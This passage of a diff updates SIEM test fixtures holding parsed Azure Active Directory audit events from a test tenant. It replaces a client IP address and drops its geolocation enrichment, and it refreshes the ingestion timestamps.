"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124912500Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -3075,25 +2805,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -3107,7 +2819,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -3243,7 +2955,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -3255,12 +2967,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036158700Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124918900Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -3286,25 +2998,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -3318,7 +3012,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": 